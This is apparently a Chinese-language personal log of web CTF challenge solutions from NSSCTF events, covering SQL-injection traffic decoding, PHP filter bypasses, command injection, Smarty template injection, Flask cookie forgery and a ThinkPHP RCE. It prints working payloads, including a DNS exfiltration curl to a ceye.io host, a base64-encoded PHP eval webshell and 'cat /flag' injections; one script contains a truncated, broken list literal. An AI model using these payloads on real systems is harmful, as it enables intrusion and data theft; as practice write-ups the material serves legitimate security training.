ctfweb刷题记录

[鹤城杯 2021]流量分析

开局拿到一个流量包，是流量分析，经典老题，

一个一个数显然太慢了，抄的脚本，

# strings timu.pcapng| grep flag > a.txt
#在kali中，将带有flag的字符提出来
import re
f = open("D:\\vscodework\\ctf\\tjctf\\a.txt","rb")
#读取a.txt
st = f.read().decode("utf-8","ignore")
#
#GET /ctf/Less-5/?id=1'%20and%20ascii(substr((select%20flag%20from%20t),1,1))=33--+ HTTP/1.1

lis = re.findall(",([0-9]*),1\)\)=([0-9]*)",st)
#获取 位数和字符数
aa = ['' for i in range(50)]
for t in lis:
    #('1', '33'), ('1', '34'), ('1', '35'), ('1', '36'), ('1', '37'), 
    #将数字为1的索引一个个填充，正好到最后一个，换索引
    aa[int(t[0])] = chr(int(t[1]))
    #print(aa)


for i in aa:
    print(i,end="")
    
    
    
sss  = [('1', '33'), ('1', '34'), ('1', '35'), ('1', '36'), ('1', '37'), ('1', '38'), ('1', '39'), ('1', '40'), ('1', '41'), ('1', '42'), ('1', '43'), ('1', '44'), ('1', '45'), ('1', '46'), ('1', '47'), ('1', '48'), ('1', '49'), ('1', '50'), ('1', '51'), ('1', '52'), ('1', '53'), ('1', '54'), ('1', '55'), ('1', '56'), ('1', '57'), ('1', '58'), ('1', '59'), ('1', '60'), ('1', '61'), ('1', '62'), ('1', '63'), ('1', '64'), ('1', '65'), ('1', '66'), ('1', '67'), ('1', '68'), ('1', '69'), ('1', '70'), ('1', '71'), ('1', '72'), ('1', '73'), ('1', '74'), ('1', '75'), ('1', '76'), ('1', '77'), ('1', '78'), ('1', '79'), ('1', '80'), ('1', '81'), ('1', '82'), ('1', '83'), ('1', '84'), ('1', '85'), ('1', '86'), ('1', '87'), ('1', '88'), ('1', '89'), ('1', '90'), ('1', '91'), ('1', '92'), ('1', '93'), ('1', '94'), ('1', '95'), ('1', '96'), ('1', '97'), ('1', '98'), ('1', '99'), ('1', '100'), ('1', '101'), ('1', '102'), ('2', '33'), ('2', '34'), ('2', '35'), ('2', '36'), ('2', '37'), ('2', '38'), ('2', '39'), ('2', '40'), ('2', '41'), ('2', '42'), ('2', '43'), ('2', '44'), ('2', '45'), ('2', '46'), ('2', '47'), ('2', '48'), ('2', '49'), ('2', '50'), ('2', '51'), ('2', '52'), ('2', '53'), ('2', '54'), ('2', '55'), ('2', '56'), ('2', '57'), ('2', '58'), ('2', '59'), ('2', '60'), ('2', '61'), ('2', '62'), ('2', '63'), ('2', '64'), ('2', '65'), ('2', '66'), ('2', '67'), ('2', '68'), ('2', '69'), ('2', '70'), ('2', '71'), ('2', '72'), ('2', '73'), ('2', '74'), ('2', '75'), ('2', '76'), ('2', '77'), ('2', '78'), ('2', '79'), ('2', '80'), ('2', '81'), ('2', '82'), ('2', '83'), ('2', '84'), ('2', '85'), ('2', '86'), ('2', '87'), ('2', '88'), ('2', '89'), ('2', '90'), ('2', '91'), ('2', '92'), ('2', '93'), ('2', '94'), ('2', '95'), ('2', '96'), ('2', '97'), ('2', '98'), ('2', '99'), ('2', '100'), ('2', '101'), ('2', '102'), ('2', '103'), ('2', '104'), ('2', '105'), ('2', '106'), ('2', '107'), ('2', '108'), ('3', '33'), ('3', '34'), ('3', '35'), ('3', '36'), 

aaa = ['' for i in range(50)]
for t in sss:
    #('1', '33'), ('1', '34'), ('1', '35'), ('1', '36'), ('1', '37'), 
    aaa[int(t[0])] = chr(int(t[1]))
    print(aaa)
        
#flag{w1reshARK_ez_1sntit}~~~~<

或者一部到位

import re
f = open("D:\\vscodework\\ctf\\tjctf\\timu.pcapng","rb")
st = f.read().decode("utf-8","ignore")
lis = re.findall(",([0-9]*),1\)\)=([0-9]*)",st)
aa = ['' for i in range(50)]
for t in lis:
    #('1', '33'), ('1', '34'), ('1', '35'), ('1', '36'), ('1', '37'), 
    aa[int(t[0])] = chr(int(t[1]))

for i in aa:
    print(i,end="")
#flag{w1reshARK_ez_1sntit}~~~~<

[鹤城杯 2021]EasyP

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?>

PHP_SELF是取 payload的后面部分，也就是/后面的

下划线可以用[代替

index.php/utils.php/%89?show[source=1

%88为非ascll字符，为什么要用不可见字符？如果把%88换成a，$_SERVER[‘PHP_SELF’]会读取到utils.php/a，basename函数就会只读取a并返回a，highlight_file就会显示a这个文件的源代码，这-明显是错误的。如果basename函数在读取到非ascll的字符时，就会停止读取路径了，就会返回utils.php，就可以达到我们想要的结果。然而basename遇到非ascii码会舍弃

index.php/utils.php/%89?show[source=1

[鹤城杯 2021]Middle magic

<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){

    $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);

    if(preg_match('/pass_the_level_1#/', $aaa)){
        echo "here is level 2";
        
        if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
            if ($_POST['admin'] == $_POST['root_pwd'])
                echo '<p>The level 2 can not pass!</p>';
        // START FORM PROCESSING    
            else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
                echo "here is level 3,do you kown how to overcome it?";
                if (isset($_POST['level_3'])) {
                    $level_3 = json_decode($_POST['level_3']);
                    
                    if ($level_3->result == $result) {
                        
                        echo "success:".$flag;
                    }
                    else {
                        echo "you never beat me!";
                    }
                }
                else{
                    echo "out";
                }
            }
            else{
                
                die("no");
            }
        // perform validations on the form data
        }
        else{
            echo '<p>out!</p>';
        }

    }
    
    else{
        echo 'nonono!';
    }

    echo '<hr>';
}

?>  here is level 2here is level 3,do you kown how to overcome it?success:NSSCTF{1cf861d8-a8f0-4ed0-92e8-2c251e4b34a6}
第一用换行符绕过
http://node4.anna.nssctf.cn:28689/?aaa=%0apass_the_level_1%23
admin[]=1&root_pwd[]=a&level_3={'result':'result'}

[MoeCTF 2021]babyRCE

<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

http://node2.anna.nssctf.cn:28603/?rce=grep${IFS}f${IFS}fla?.php

http://node2.anna.nssctf.cn:28603/?rce=ca\t${IFS}fla\g.php

用这个空格${IFS} 其他好像不行

[LitCTF 2023]作业管理系统

看了一下是探姬师傅出的题，以为很难，其实没那么难，开局看到源代码有默认口令，admin/admin

登录上去，直接这里上传文件就行了，

会上传到./下，也就是当前目录，也就是直接访问就行了。

[LitCTF 2023]Ping

command=127.0.0.1;cat /flag&ping=Ping

[LitCTF 2023]Vim yyds

在vim 编辑错误的时候，会产生.index.php.swp文件，所以直接下载``http://node2.anna.nssctf.cn:28510/.index.php.swp，下载好后，直接打开会乱码，随便拖个linux上，然后 vim -r 文件，即可看到源码

[LitCTF 2023]Flag点击就送！

└─# python3 flask_session_cookie_manager3.py decode -c 'eyJuYW1lIjoiMTIzMTIzIn0.ZJBfaw.eXjErywCjj_0-tZe0l8-X_jc6hA' -s 'LitCTF'
{'name': '123123'}


┌──(root㉿bohemian)-[/tools/flask-session-cookie-manager]
└─# python3 flask_session_cookie_manager3.py decode -c 'eyJuYW1lIjoiMTIzMTIzMTIzIn0.ZJBf2g.6hBTi7wSIWzWnWHr8F4P9t4CItw' -s 'LitCTF'
{'name': '123123123'}

┌──(root㉿bohemian)-[/tools/flask-session-cookie-manager]
└─# python3 flask_session_cookie_manager3.py encode -s 'LitCTF' -t "{'name': 'admin'}"
eyJuYW1lIjoiYWRtaW4ifQ.ZJBgMQ.JTcEaSlnwJUiq70P847ooZJe0T4

[LitCTF 2023]PHP是世界上最好的语言！！

猜的

LitCTF 2023]Http pro max plus已解决

Client-Ip: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Remote-Addr: 127.0.0.1
X-Real-Ip: 127.0.0.1
REMOTE-HOST: 127.0.0.1
via:127.0.0.1
Client-Ip: 127.0.0.1 

 var list_of_fake_ip_headers = ["X-Forwarded-For","X-Forwarded","Forwarded-For","Forwarded","X-Forwarded-Host","X-remote-IP","X-remote-addr","True-Client-IP","X-Client-IP","Client-IP","X-Real-IP","Ali-CDN-Real-IP","Cdn-Src-Ip","Cdn-Real-Ip","CF-Connecting-IP","X-Cluster-Client-IP","WL-Proxy-Client-IP","Proxy-Client-IP","Fastly-Client-Ip","True-Client-Ip"];

NSSCTF{50e3aa21-3d2f-4b28-9670-ac2590b70250}

[GDOUCTF 2023]EZ WEB

改成put就可以了

[HDCTF 2023]SearchMaster

<title>BadBadBooooy</title>

php smart

data={if system('cat /flag_13_searchmaster')}{/if}

[SWPUCTF 2021 新生赛]finalrce

<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

无回显rce ,exec无回显

dns外带，但是好像今天http://ceye.io/不能用了，

1
2
3

?url=1;curl `whoami`.*****s.ceye.io/

方法二

?url=l''s / | tee 1.txt
访问http://node2.anna.nssctf.cn:28030/1.txt
?url=ca''t /flllll\aaaaaaggggggg | tee 2.txt
?url=ca''t /flllll''aaaaaaggggggg | tee 2.txt
访问http://node2.anna.nssctf.cn:28030/2.txt

[羊城杯 2020]easycon

很简单的题，访问网站，跳到了apache2的使用页面，访问index.php,跳到页面，弹窗提示，eval cmd post 那么就直接cmd=phpinfo();,翻了一圈没找到flag，发现有个bbbbbb.txt ,直接用厨子解下

有个图片，就出flag了。

[SWPUCTF 2021 新生赛]PseudoProtocols

直接php伪协议读取hint.php

http://node2.anna.nssctf.cn:28419/index.php?wllm=php://filter/convert.base64-encode/resource=hint.php

<?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?>

直接读即可http://node2.anna.nssctf.cn:28419/test2222222222222.php?a=data://text/plain,I want flag

[SWPUCTF 2022 新生赛]ez_rce

echo “PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+” | base64 -d > s.php

PD9waHAgQGV2YWwoJF9QT1NUWydnJ10pOz8+

http://node1.anna.nssctf.cn:28306/NSS/in1dex.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=

[HUBUCTF 2022 新生赛]checkin

<?php
show_source(__FILE__);
$username  = "this_is_secret"; 
$password  = "this_is_not_known_to_you"; 
include("flag.php");//here I changed those two 
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}

<?php
$info = array(
	'username'=>true,
	'password'=>true
);
$serialized_data = serialize($info);
echo  $serialized_data ;
?>
    
    
?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}